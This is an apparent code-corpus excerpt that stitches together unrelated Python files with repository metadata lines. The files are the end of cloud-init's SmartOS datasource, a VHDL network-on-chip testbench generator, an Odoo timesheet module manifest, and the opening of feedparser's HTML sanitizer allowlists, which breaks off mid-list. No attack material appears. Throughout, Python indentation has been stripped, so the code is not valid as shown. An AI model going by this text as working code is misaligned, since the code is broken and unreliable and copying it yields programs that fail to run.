list(SMARTOS_ATTRIB_MAP.keys()) + ['network_config'])
else:
keys = sys.argv[1:]
def load_key(client, key, data):
if key in data:
return data[key]
if key in SMARTOS_ATTRIB_JSON:
keyname = SMARTOS_ATTRIB_JSON[key]
data[key] = client.get_json(keyname)
elif key == "network_config":
for depkey in ('network-data', 'dns_servers', 'dns_domain'):
load_key(client, depkey, data)
data[key] = convert_smartos_network_data(
network_data=data['network-data'],
dns_servers=data['dns_servers'],
dns_domain=data['dns_domain'])
else:
if key in SMARTOS_ATTRIB_MAP:
keyname, strip = SMARTOS_ATTRIB_MAP[key]
else:
keyname, strip = (key, False)
data[key] = client.get(keyname, strip=strip)
return data[key]
data = {}
for key in keys:
load_key(client=jmc, key=key, data=data)
print(json.dumps(data, indent=1, sort_keys=True,
separators=(',', ': ')))
|
prometheanfire/cloud-init
|
cloudinit/sources/DataSourceSmartOS.py
|
Python
|
gpl-3.0
| 29,325
|
# Copyright (C) 2016 Siavoosh Payandeh Azad
from math import ceil, log
import random
# -D [size]: sets the size of the network, it can be powers of two
# -Rand: generates random traffic patterns
import sys
if '--help' in sys.argv[1:]:
print "\t-D [network size]: makes a test bench for network of [size]X[size]. Size can be "
print "\t only multiples of two. default value is 4."
print "\t-DW [data_width]: sets the data width of the network!"
print "\t[-Rand/-BR] [PIR]: Uses [Rand]om traffic pattern generator with packet injection rate equal to PIR"
print "\t or Uses [B]it[R]eversal traffic pattern generator with packet injection rate equal to PIR"
print "\t default case is repetitive packets being sent from source to same destination"
print "\t-o: specifies the name and path of the output file. default path is current folder!"
print "\t-PS [min packet size] [max packet size]: specifies packet size. default min value is 3 and default max value is 8."
print "\t-PE: adds processing elements in each node"
print "\t-SHMU: maps shmu on one of the nodes"
print "\t-NI_Test: adds an NI to the nodes and connects a traffic generator to it"
print "\t-trace: adds trackers to network outputs"
print "\t-sim: specifies the length of simulation in clock cycles. which at this time the packet generators will stop sending packets."
print "\t-verbal: prints more details"
print "\t**Example 1: python network_tb_gen_parameterized_credit_based.py -D 2 -SHMU -NI_Test -Rand 0.01 -PS 3 3 -sim 10000 "
print "\t generates a testbench for a 2X2 network and adds NIs and NI_Testers to it which sends packets to random destinations "
print "\t with 0.01 injection rate, and packet size of 3 until 10000 ns"
print "\t**Example 2: python network_tb_gen_parameterized_credit_based.py -D 2 -Rand 0.005 -PS 3 3 -sim 10000 "
print "\t generates a testbench for a 2X2 network which uses random traffic pattern generator with PIR of 0.005 and fixed"
print "\t packet size of 3 and sends packets until 10000 ns"
sys.exit()
network_dime = 4
data_width = 32
random_dest = False
add_tracker = False
add_SHMU = False
add_node = False
add_NI_Test = False
got_finish_time = False
sim_finish_time = None
bit_reversal = False
get_packet_size = False
packet_size_min = 3
packet_size_max = 8
verbal = False
# file_path = file_name+'_'+str(network_dime)+"x"+str(network_dime)+'.vhd'
if '-D' in sys.argv[1:]:
network_dime = int(sys.argv[sys.argv.index('-D')+1])
if '-DW' in sys.argv[1:]:
data_width = int(sys.argv[sys.argv.index('-DW')+1])
if data_width % 2 != 0:
raise ValueError("wrong data width. please choose powers of 2. for example 32!")
if '-Rand' in sys.argv[1:]:
random_dest = True
PIR = float(sys.argv[sys.argv.index('-Rand')+1])
frame_size = int(ceil(1.0/PIR))
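# For example, a PIR of 0.01 gives frame_size = 100; the assumption here is
# that the TB_Package generators treat this as the frame length in clock
# cycles, i.e. on average one packet is injected per 100-cycle frame.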
if '-SHMU' in sys.argv[1:]:
add_SHMU = True
if '-NI_Test' in sys.argv[1:]:
add_NI_Test = True
if "-PE" in sys.argv[1:]:
add_node = True
if "-trace" in sys.argv[1:]:
add_tracker = True
if '-BR' in sys.argv[1:]:
bit_reversal = True
PIR = float(sys.argv[sys.argv.index('-BR')+1])
frame_size = int(ceil(1.0/PIR))
if random_dest and bit_reversal:
raise ValueError("Can not accept multiple traffic patterns at the same time...")
if '-sim' in sys.argv[1:]:
got_finish_time = True
sim_finish_time = int(sys.argv[sys.argv.index('-sim')+1])
if '-PS' in sys.argv[1:]:
get_packet_size = True
packet_size_min = int(sys.argv[sys.argv.index('-PS')+1])
packet_size_max = int(sys.argv[sys.argv.index('-PS')+2])
if '-verbal' in sys.argv[1:]:
verbal = True
file_name = 'tb_network'
if random_dest:
file_name += '_rand'
elif bit_reversal:
file_name += '_br'
if '-o' in sys.argv[1:]:
file_path = sys.argv[sys.argv.index('-o')+1]
if ".vhd" not in file_path:
raise ValueError("wrong file extention. only vhdl files are accepted!")
else:
file_path = file_name+'_'+str(network_dime)+"x"+str(network_dime)+'.vhd'
noc_file = open(file_path, 'w')
if add_NI_Test and add_node:
raise ValueError("cant have -NI_Test and -PE at the same time")
noc_file.write("--Copyright (C) 2016 Siavoosh Payandeh Azad\n")
noc_file.write("------------------------------------------------------------\n")
noc_file.write("-- This file is automatically generated Please do not change!\n")
noc_file.write("-- Here are the parameters:\n")
noc_file.write("-- \t network size x:"+str(network_dime)+"\n")
noc_file.write("-- \t network size y:"+str(network_dime)+"\n")
noc_file.write("-- \t data width:"+str(data_width))
noc_file.write("-- \t traffic pattern:"+str())
noc_file.write("------------------------------------------------------------\n\n")
noc_file.write("library ieee;\n")
noc_file.write("use ieee.std_logic_1164.all;\n")
noc_file.write("use IEEE.STD_LOGIC_ARITH.ALL;\n")
noc_file.write("use IEEE.STD_LOGIC_UNSIGNED.ALL;\n")
noc_file.write("use work.TB_Package.all;\n\n")
noc_file.write("USE ieee.numeric_std.ALL; \n")
noc_file.write("use IEEE.math_real.\"ceil\";\n")
noc_file.write("use IEEE.math_real.\"log2\";\n\n")
noc_file.write("entity tb_network_"+str(network_dime)+"x"+str(network_dime)+" is\n")
noc_file.write("end tb_network_"+str(network_dime)+"x"+str(network_dime)+"; \n")
noc_file.write("\n\n")
noc_file.write("architecture behavior of tb_network_"+str(network_dime)+"x"+str(network_dime)+" is\n\n")
noc_file.write("-- Declaring network component\n")
string_to_print = ""
noc_file.write("component network_"+str(network_dime)+"x"+str(network_dime)+" is\n")
noc_file.write(" generic (DATA_WIDTH: integer := 32; DATA_WIDTH_LV: integer := 11);\n")
noc_file.write("port (reset: in std_logic; \n")
noc_file.write("\tclk: in std_logic; \n")
if not add_SHMU:
noc_file.write("\tRxy_reconf: in std_logic_vector(7 downto 0);\n")
noc_file.write("\tReconfig : in std_logic;\n")
for i in range(network_dime**2):
noc_file.write("\t--------------\n")
noc_file.write("\tRX_L_"+str(i)+": in std_logic_vector (DATA_WIDTH-1 downto 0);\n")
noc_file.write("\tcredit_out_L_"+str(i)+", valid_out_L_"+str(i)+": out std_logic;\n")
noc_file.write("\tcredit_in_L_"+str(i)+", valid_in_L_"+str(i)+": in std_logic;\n")
if i == network_dime**2-1 and add_SHMU== False:
noc_file.write("\tTX_L_"+str(i)+": out std_logic_vector (DATA_WIDTH-1 downto 0)\n")
else:
noc_file.write("\tTX_L_"+str(i)+": out std_logic_vector (DATA_WIDTH-1 downto 0);\n")
if add_SHMU:
for i in range(0, network_dime**2):
string_to_print +="\t--------------\n"
string_to_print +=" link_faults_"+str(i) +": out std_logic_vector(4 downto 0);\n"
string_to_print +=" turn_faults_"+str(i) +": out std_logic_vector(19 downto 0);\n"
string_to_print +=" Rxy_reconf_PE_"+str(i) +": in std_logic_vector(7 downto 0);\n"
string_to_print +=" Cx_reconf_PE_"+str(i) +": in std_logic_vector(3 downto 0);\n"
string_to_print +=" Reconfig_command_"+str(i) +" : in std_logic;\n\n"
noc_file.write(string_to_print[:len(string_to_print)-3])
noc_file.write("\n ); \n")
noc_file.write("end component; \n")
if add_tracker:
noc_file.write("component flit_tracker is\n")
noc_file.write(" generic (\n")
noc_file.write(" DATA_WIDTH: integer := 32;\n")
noc_file.write(" tracker_file: string :=\"track.txt\"\n")
noc_file.write(" );\n")
noc_file.write(" port (\n")
noc_file.write(" clk: in std_logic;\n")
noc_file.write(" RX: in std_logic_vector (DATA_WIDTH-1 downto 0); \n")
noc_file.write(" valid_in : in std_logic \n")
noc_file.write(" );\n")
noc_file.write("end component;\n")
if add_node and not add_SHMU and not add_NI_Test:
noc_file.write("component NoC_Node is\n")
noc_file.write("generic( current_address : integer := 0; stim_file: string :=\"code.txt\";\n")
noc_file.write("\tlog_file : string := \"output.txt\");\n\n")
noc_file.write("port( reset : in std_logic;\n")
noc_file.write(" clk : in std_logic;\n")
noc_file.write(" \n")
noc_file.write(" credit_in : in std_logic;\n")
noc_file.write(" valid_out: out std_logic;\n")
noc_file.write(" TX: out std_logic_vector(31 downto 0);\n")
noc_file.write("\n")
noc_file.write(" credit_out : out std_logic;\n")
noc_file.write(" valid_in: in std_logic;\n")
noc_file.write(" RX: in std_logic_vector(31 downto 0)\n")
noc_file.write(" );\n")
noc_file.write("end component; --component NoC_Node\n")
elif add_node and add_SHMU and not add_NI_Test:
noc_file.write("-- Declaring Node component\n\n")
noc_file.write("component NoC_Node is\n")
noc_file.write("generic( current_address : integer := 0;\n")
noc_file.write(" stim_file: string :=\"code.txt\";\n")
noc_file.write(" log_file : string := \"output.txt\");\n")
noc_file.write("\n")
noc_file.write("port( reset : in std_logic;\n")
noc_file.write(" clk : in std_logic;\n")
noc_file.write("\n")
noc_file.write(" credit_in : in std_logic;\n")
noc_file.write(" valid_out: out std_logic;\n")
noc_file.write(" TX: out std_logic_vector(31 downto 0);\n")
noc_file.write("\n")
noc_file.write(" credit_out : out std_logic;\n")
noc_file.write(" valid_in: in std_logic;\n")
noc_file.write(" RX: in std_logic_vector(31 downto 0);\n")
noc_file.write("\n")
noc_file.write(" link_faults: in std_logic_vector(4 downto 0);\n")
noc_file.write(" turn_faults: in std_logic_vector(19 downto 0);\n")
noc_file.write("\n")
noc_file.write(" Rxy_reconf_PE: out std_logic_vector(7 downto 0);\n")
noc_file.write(" Cx_reconf_PE: out std_logic_vector(3 downto 0);\n")
noc_file.write(" Reconfig_command : out std_logic\n")
noc_file.write("\n")
noc_file.write(" );\n")
noc_file.write("end component; --component NoC_Node\n")
elif not add_node and add_SHMU and add_NI_Test:
noc_file.write("-- Declaring NI component\n\n")
noc_file.write("component NI is\n")
noc_file.write(" generic(current_address : integer := 10; -- the current node's address\n")
noc_file.write(" SHMU_address : integer := 0); \n")
# noc_file.write(" reserved_address : std_logic_vector(29 downto 0) := \"000000000000000001111111111111\";\n")
# noc_file.write(" flag_address : std_logic_vector(29 downto 0) := \"000000000000000010000000000000\"; -- reserved address for the memory mapped I/O\n")
# noc_file.write(" counter_address : std_logic_vector(29 downto 0) := \"000000000000000010000000000001\";\n")
# noc_file.write(" reconfiguration_address : std_logic_vector(29 downto 0) := \"000000000000000010000000000010\"; -- reserved address for reconfiguration register\n")
# noc_file.write(" self_diagnosis_address : std_logic_vector(29 downto 0) := \"000000000000000010000000000011\"); -- reserved address for self diagnosis register\n")
noc_file.write(" port(clk : in std_logic;\n")
noc_file.write(" reset : in std_logic;\n")
noc_file.write(" enable : in std_logic;\n")
noc_file.write(" write_byte_enable : in std_logic_vector(3 downto 0);\n")
noc_file.write(" address : in std_logic_vector(31 downto 2);\n")
noc_file.write(" data_write : in std_logic_vector(31 downto 0);\n")
noc_file.write(" data_read : out std_logic_vector(31 downto 0);\n")
noc_file.write("\n")
noc_file.write(" -- Flags used by JNIFR and JNIFW instructions\n")
noc_file.write(" --NI_read_flag : out std_logic; -- One if the N2P fifo is empty. No read should be performed if one.\n")
noc_file.write(" --NI_write_flag : out std_logic; -- One if P2N fifo is full. no write should be performed if one.\n")
noc_file.write(" -- interrupt signal: generated evertime a packet is recieved!\n")
noc_file.write(" irq_out : out std_logic;\n")
noc_file.write(" -- signals for sending packets to network\n")
noc_file.write(" credit_in : in std_logic;\n")
noc_file.write(" valid_out: out std_logic;\n")
noc_file.write(" TX: out std_logic_vector(31 downto 0); -- data sent to the NoC\n")
noc_file.write(" -- signals for reciving packets from the network\n")
noc_file.write(" credit_out : out std_logic;\n")
noc_file.write(" valid_in: in std_logic;\n")
noc_file.write(" RX: in std_logic_vector(31 downto 0); -- data recieved form the NoC\n")
noc_file.write(" -- fault information signals from the router\n")
noc_file.write(" link_faults: in std_logic_vector(4 downto 0);\n")
noc_file.write(" turn_faults: in std_logic_vector(19 downto 0);\n")
noc_file.write("\n")
noc_file.write(" Rxy_reconf_PE: out std_logic_vector(7 downto 0);\n")
noc_file.write(" Cx_reconf_PE: out std_logic_vector(3 downto 0); -- if you are not going to update Cx you should write all ones! (it will be and will the current Cx bits)\n")
noc_file.write(" Reconfig_command : out std_logic\n")
noc_file.write(" );\n")
noc_file.write("end component; --component NI\n")
noc_file.write("\n")
noc_file.write("-- generating bulk signals...\n")
for i in range(0, network_dime*network_dime):
noc_file.write("\tsignal RX_L_"+str(i)+", TX_L_"+str(i)+": std_logic_vector ("+str(data_width-1)+" downto 0);\n")
noc_file.write("\tsignal credit_counter_out_"+str(i)+": std_logic_vector (1 downto 0);\n")
noc_file.write("\tsignal credit_out_L_"+str(i)+", credit_in_L_"+str(i)+", valid_in_L_"+str(i)+", valid_out_L_"+str(i) + ": std_logic;\n")
#noc_file.write("\n\nAlias buried_sig is <<signal .NoC.valid_in_E_11 :std_logic>>;\n\n")
if add_SHMU:
for i in range(0, network_dime*network_dime):
noc_file.write("\tsignal link_faults_"+str(i)+ " : std_logic_vector(4 downto 0);\n")
noc_file.write("\tsignal turn_faults_"+str(i)+ " : std_logic_vector(19 downto 0);\n")
noc_file.write("\tsignal Rxy_reconf_PE_"+str(i)+ " : std_logic_vector(7 downto 0);\n")
noc_file.write("\tsignal Cx_reconf_PE_"+str(i)+ " : std_logic_vector(3 downto 0);\n")
noc_file.write("\tsignal Reconfig_command_"+str(i)+ " : std_logic;\n")
noc_file.write("\t-- NI testing signals\n")
if add_NI_Test:
noc_file.write("\tsignal reserved_address : std_logic_vector(29 downto 0):= \"000000000000000001111111111111\";\n")
noc_file.write("\tsignal flag_address : std_logic_vector(29 downto 0):= \"000000000000000010000000000000\" ; -- reserved address for the memory mapped I/O\n")
noc_file.write("\tsignal counter_address : std_logic_vector(29 downto 0):= \"000000000000000010000000000001\";\n")
noc_file.write("\tsignal reconfiguration_address : std_logic_vector(29 downto 0):= \"000000000000000010000000000010\"; -- reserved address for reconfiguration register\n")
noc_file.write("\tsignal self_diagnosis_address : std_logic_vector(29 downto 0):= \"000000000000000010000000000011\";\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "irq_out_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic;\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "test_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic_vector(31 downto 0);\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "enable_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic;\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "write_byte_enable_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic_vector(3 downto 0);\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "address_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic_vector(31 downto 2);\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "data_write_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic_vector(31 downto 0);\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "data_read_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic_vector(31 downto 0);\n")
noc_file.write("\t--------------\n")
if not add_SHMU:
noc_file.write("\tsignal Rxy_reconf: std_logic_vector (7 downto 0) := \"01111101\";\n")
noc_file.write("\tsignal Reconfig: std_logic := '0';\n")
noc_file.write("\t--------------\n")
noc_file.write("\tconstant clk_period : time := 10 ns;\n")
noc_file.write("\tsignal reset, not_reset, clk: std_logic :='0';\n")
noc_file.write("\n")
noc_file.write("begin\n\n")
noc_file.write(" clk_process :process\n")
noc_file.write(" begin\n")
noc_file.write(" clk <= '0';\n")
noc_file.write(" wait for clk_period/2; \n")
noc_file.write(" clk <= '1';\n")
noc_file.write(" wait for clk_period/2; \n")
noc_file.write(" end process;\n")
noc_file.write("\n")
noc_file.write("reset <= '1' after 1 ns;\n")
noc_file.write("-- instantiating the network\n")
if add_tracker:
noc_file.write("-- instantiating the flit trackers\n")
for i in range(0, network_dime**2):
noc_file.write("F_T_"+str(i)+"_T: flit_tracker generic map (\n")
noc_file.write(" DATA_WIDTH => "+str(data_width)+", \n")
noc_file.write(" tracker_file =>\"traces/track"+str(i)+"_T.txt\"\n")
noc_file.write(" )\n")
noc_file.write(" port map (\n")
noc_file.write(" clk => clk, RX => TX_L_"+str(i)+", \n")
noc_file.write(" valid_in => valid_out_L_"+str(i)+"\n")
noc_file.write(" );\n")
string_to_print = ""
string_to_print += "NoC: network_"+str(network_dime)+"x"+str(network_dime)+" generic map (DATA_WIDTH => "+str(data_width)+", DATA_WIDTH_LV => 11)\n"
if not add_SHMU:
string_to_print += "port map (reset, clk, Rxy_reconf, Reconfig, \n"
else:
string_to_print += "port map (reset, clk, \n"
for i in range(network_dime**2):
string_to_print += "\tRX_L_"+str(i)+", credit_out_L_"+str(i)+", valid_out_L_"+str(i)+", credit_in_L_"+str(i)+", valid_in_L_"+str(i)+", TX_L_"+str(i)+", \n"
if add_SHMU:
string_to_print += "\t-- should be connected to NI\n"
for i in range(0, network_dime**2):
string_to_print += "\tlink_faults_"+str(i)+", turn_faults_"+str(i)+","
string_to_print += "\tRxy_reconf_PE_"+str(i)+", Cx_reconf_PE_"+str(i)+", Reconfig_command_"+str(i)+", \n"
noc_file.write(string_to_print[:len(string_to_print)-3])
noc_file.write("\n ); \n")
noc_file.write("not_reset <= not reset; \n")
if add_node and not add_SHMU and not add_NI_Test:
noc_file.write("\n")
noc_file.write("-- connecting the PEs\n")
for node_number in range(0, network_dime*network_dime):
noc_file.write("PE_" + str(node_number) + ": NoC_Node \n")
noc_file.write("generic map( current_address => " + str(node_number) + ",\n")
noc_file.write("\tstim_file => \"code_" + str(node_number).zfill(3) + ".txt\",\n")
noc_file.write("\tlog_file => \"output_" + str(node_number).zfill(3) + ".txt\")\n\n")
noc_file.write("port map( not_reset, clk, \n")
noc_file.write("\n")
noc_file.write(" credit_in => credit_out_L_" + str(node_number) + ", \n")
noc_file.write(" valid_out => valid_in_L_" + str(node_number) + ",\n")
noc_file.write(" TX => RX_L_" + str(node_number) + ", \n")
noc_file.write("\n")
noc_file.write(" credit_out => credit_in_L_" + str(node_number) + ", \n")
noc_file.write(" valid_in => valid_out_L_" + str(node_number) + ",\n")
noc_file.write(" RX => TX_L_" + str(node_number) + "\n")
noc_file.write(" );\n")
if add_SHMU and not add_NI_Test:
noc_file.write("\n")
noc_file.write("-- connecting the PEs\n")
for node_number in range(0, network_dime*network_dime):
noc_file.write("PE_" + str(node_number) + ": NoC_Node \n")
noc_file.write("generic map( current_address => " + str(node_number) + ",\n")
noc_file.write("\tstim_file => \"code_" + str(node_number) + ".txt\",\n")
noc_file.write("\tlog_file => \"output_" + str(node_number) + ".txt\")\n\n")
noc_file.write("port map( not_reset, clk, \n")
noc_file.write("\n")
noc_file.write(" credit_in => credit_out_L_" + str(node_number) + ", \n")
noc_file.write(" valid_out => valid_in_L_" + str(node_number) + ",\n")
noc_file.write(" TX => RX_L_" + str(node_number) + ", \n")
noc_file.write("\n")
noc_file.write(" credit_out => credit_in_L_" + str(node_number) + ", \n")
noc_file.write(" valid_in => valid_out_L_" + str(node_number) + ",\n")
noc_file.write(" RX => TX_L_" + str(node_number) + ",\n")
noc_file.write(" link_faults => link_faults_"+str(node_number)+",\n")
noc_file.write(" turn_faults => turn_faults_"+str(node_number)+",\n")
noc_file.write(" Rxy_reconf_PE => Rxy_reconf_PE_"+str(node_number)+", \n")
noc_file.write(" Cx_reconf_PE => Cx_reconf_PE_"+str(node_number)+",\n")
noc_file.write(" Reconfig_command => Reconfig_command_"+str(node_number)+"\n")
noc_file.write(" );\n")
elif add_NI_Test and add_SHMU:
noc_file.write("\n")
noc_file.write("-- connecting the NIs\n")
for node_number in range(0, network_dime*network_dime):
noc_file.write("NI_" + str(node_number) + ": NI \n")
noc_file.write(" generic map(current_address => " + str(node_number) + "\n")
noc_file.write(" ) \n")
noc_file.write(" port map(clk => clk , reset => not_reset , enable => enable_" + str(node_number) + ", \n")
noc_file.write(" write_byte_enable => write_byte_enable_" + str(node_number) + ", \n")
noc_file.write(" address => address_" + str(node_number) + ", \n")
noc_file.write(" data_write => data_write_" + str(node_number) + ", \n")
noc_file.write(" data_read => data_read_" + str(node_number) + ", \n")
noc_file.write(" -- interrupt signal: generated evertime a packet is recieved!\n")
noc_file.write(" irq_out => irq_out_" + str(node_number) + ", \n")
noc_file.write(" -- signals for sending packets to network\n")
noc_file.write(" credit_in => credit_out_L_" + str(node_number) + ", \n")
noc_file.write(" valid_out => valid_in_L_" + str(node_number) + ",\n")
noc_file.write(" TX => RX_L_" + str(node_number) + ", -- data sent to the NoC\n")
noc_file.write(" -- signals for reciving packets from the network\n")
noc_file.write(" credit_out => credit_in_L_" + str(node_number) + ", \n")
noc_file.write(" valid_in => valid_out_L_" + str(node_number) + ",\n")
noc_file.write(" RX => TX_L_" + str(node_number) + ",\n")
noc_file.write(" -- fault information signals from the router\n")
noc_file.write(" link_faults => link_faults_" + str(node_number) + ", \n")
noc_file.write(" turn_faults => turn_faults_" + str(node_number) + ",\n")
noc_file.write("\n")
noc_file.write(" Rxy_reconf_PE => Rxy_reconf_PE_" + str(node_number) + ", \n")
noc_file.write(" Cx_reconf_PE => Cx_reconf_PE_" + str(node_number) + ",\n")
noc_file.write(" Reconfig_command => Reconfig_command_" + str(node_number) + "\n")
noc_file.write(" );\n")
noc_file.write("\n\n")
noc_file.write("-- connecting the packet generators\n")
for node_number in range(0, network_dime*network_dime):
random_start = random.randint(3, 50)
if got_finish_time:
random_end = sim_finish_time
else:
random_end = random.randint(random_start, 200)
noc_file.write("NI_control("+str(network_dime)+", "+str(frame_size)+", "+str(node_number)+", "+str(random_start)+", " +str(packet_size_min)+", " +str(packet_size_max)+", "+str(random_end)+" ns, clk,\n")
noc_file.write(" -- NI configuration\n")
noc_file.write(" reserved_address, flag_address, counter_address, reconfiguration_address, self_diagnosis_address,\n")
noc_file.write(" -- NI signals\n")
noc_file.write(" enable_" + str(node_number) + ", write_byte_enable_" + str(node_number) + ", address_" + str(node_number) + ", data_write_" + str(node_number) + ", data_read_" + str(node_number) + ", test_"+str(node_number)+"); \n")
noc_file.write("\n")
else:
noc_file.write("\n")
noc_file.write("-- connecting the packet generators\n")
if random_dest or bit_reversal:
for i in range(0, network_dime*network_dime):
random_start = random.randint(3, 50)
if got_finish_time:
random_end = sim_finish_time
else:
random_end = random.randint(random_start, 200)
noc_file.write("credit_counter_control(clk, credit_out_L_"+str(i)+", valid_in_L_"+str(i)+", credit_counter_out_"+str(i)+");\n")
if random_dest:
noc_file.write("gen_random_packet("+str(network_dime)+", "+str(frame_size)+", "+str(i)+", "+str(random_start)+", " +str(packet_size_min)+", " +str(packet_size_max)+", " +
str(random_end)+" ns, clk, credit_counter_out_"+str(i)+", valid_in_L_"+str(i)+", RX_L_"+str(i)+");\n")
elif bit_reversal:
noc_file.write("gen_bit_reversed_packet("+str(network_dime)+", "+str(frame_size)+", "+str(i)+", "+str(random_start)+", " +str(packet_size_min)+", " +str(packet_size_max)+", " +
str(random_end)+" ns, clk, credit_counter_out_"+str(i)+", valid_in_L_"+str(i)+", RX_L_"+str(i)+");\n")
noc_file.write("\n")
if not add_node and not add_NI_Test:
noc_file.write("\n")
noc_file.write("-- connecting the packet receivers\n")
for i in range(0, network_dime*network_dime):
noc_file.write("get_packet("+str(data_width)+", 5, "+str(i)+", clk, credit_in_L_"+str(i)+", valid_out_L_"+str(i)+", TX_L_"+str(i)+");\n")
noc_file.write("\n\n")
noc_file.write("end;\n")
|
siavooshpayandehazad/NoC_Router
|
Scripts/credit_based/network_tb_gen_parameterized_credit_based.py
|
Python
|
gpl-3.0
| 26,573
|
# -*- encoding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
{
'name': 'Timesheet on Issues',
'version': '1.0',
'category': 'Project Management',
'description': """
This module adds the Timesheet support for the Issues/Bugs Management in Project.
=================================================================================
Worklogs can be maintained to signify number of hours spent by users to handle an issue.
""",
'website': 'https://www.odoo.com/page/project-management',
'depends': [
'project_issue',
'hr_timesheet_sheet',
],
'data': [
'project_issue_sheet_view.xml',
'security/ir.model.access.csv',
'security/portal_security.xml',
],
'demo': [],
'installable': True,
'auto_install': False,
}
|
akhmadMizkat/odoo
|
addons/project_issue_sheet/__openerp__.py
|
Python
|
gpl-3.0
| 850
|
# Copyright 2010-2020 Kurt McKee <contactme@kurtmckee.org>
# Copyright 2002-2008 Mark Pilgrim
# All rights reserved.
#
# This file is a part of feedparser.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
from __future__ import unicode_literals
import re
from .html import _BaseHTMLProcessor
from .sgml import _SGML_AVAILABLE
from .urls import make_safe_absolute_uri
class _HTMLSanitizer(_BaseHTMLProcessor):
acceptable_elements = {
'a',
'abbr',
'acronym',
'address',
'area',
'article',
'aside',
'audio',
'b',
'big',
'blockquote',
'br',
'button',
'canvas',
'caption',
'center',
'cite',
'code',
'col',
'colgroup',
'command',
'datagrid',
'datalist',
'dd',
'del',
'details',
'dfn',
'dialog',
'dir',
'div',
'dl',
'dt',
'em',
'event-source',
'fieldset',
'figcaption',
'figure',
'font',
'footer',
'form',
'h1',
'h2',
'h3',
'h4',
'h5',
'h6',
'header',
'hr',
'i',
'img',
'input',
'ins',
'kbd',
'keygen',
'label',
'legend',
'li',
'm',
'map',
'menu',
'meter',
'multicol',
'nav',
'nextid',
'noscript',
'ol',
'optgroup',
'option',
'output',
'p',
'pre',
'progress',
'q',
's',
'samp',
'section',
'select',
'small',
'sound',
'source',
'spacer',
'span',
'strike',
'strong',
'sub',
'sup',
'table',
'tbody',
'td',
'textarea',
'tfoot',
'th',
'thead',
'time',
'tr',
'tt',
'u',
'ul',
'var',
'video',
}
acceptable_attributes = {
'abbr',
'accept',
'accept-charset',
'accesskey',
'action',
'align',
'alt',
'autocomplete',
'autofocus',
'axis',
'background',
'balance',
'bgcolor',
'bgproperties',
'border',
'bordercolor',
'bordercolordark',
'bordercolorlight',
'bottompadding',
'cellpadding',
'cellspacing',
'ch',
'challenge',
'char',
'charoff',
'charset',
'checked',
'choff',
'cite',
'class',
'clear',
'color',
'cols',
'colspan',
'compact',
'contenteditable',
'controls',
'coords',
'data',
'datafld',
'datapagesize',
'datasrc',
'datetime',
'default',
'delay',
'dir',
'disabled',
'draggable',
'dynsrc',
'enctype',
'end',
'face',
'for',
'form',
'frame',
'galleryimg',
'gutter',
'headers',
'height',
'hidden',
'hidefocus',
'high',
'href',
'hreflang',
'hspace',
'icon',
'id',
'inputmode',
'ismap',
'keytype',
'label',
'lang',
'leftspacing',
'list',
'longdesc',
'loop',
'loopcount',
'loopend',
'loopstart',
'low',
'lowsrc',
'max',
'maxlength',
'media',
'method',
'min',
'multiple',
'name',
'nohref',
'noshade',
'nowrap',
'open',
'optimum',
'pattern',
'ping',
'point-size',
'poster',
'pqg',
'preload',
'prompt',
'radiogroup',
'readonly',
'rel',
'repeat-max',
'repeat-min',
'replace',
'required',
'rev',
'rightspacing',
'rows',
'rowspan',
'rules',
'scope',
'selected',
'shape',
'size',
'span',
'src',
'start',
'step',
'style',
'summary',
'suppress',
'tabindex',
'target',
'template',
'title',
'toppadding',
'type',
'unselectable',
'urn',
'usemap',
'valign',
'value',
'variable',
'volume',
'vrml',
'vspace',
'width',
'wrap',
'xml:lang',
}
unacceptable_elements_with_end_tag = {
'applet',
'script',
'style',
}
acceptable_css_properties = {
'azimuth',
'background-color',
'border-bottom-color',
'border-collapse',
'border-color',
'border-left-color',
'border-right-color',
'border-top-color',
'clear',
'color',
'cursor',
'direction',
'display',
'elevation',
'float',
'font',
'font-family',
'font-size',
'font-style',
'font-variant',
'font-weight',
'height',
'letter-spacing',
'line-height',
'overflow',
'pause',
'pause-after',
'pause-before',
'pitch',
'pitch-range',
'richness',
'speak',
'speak-header',
'speak-numeral',
'speak-punctuation',
'speech-rate',
'stress',
'text-align',
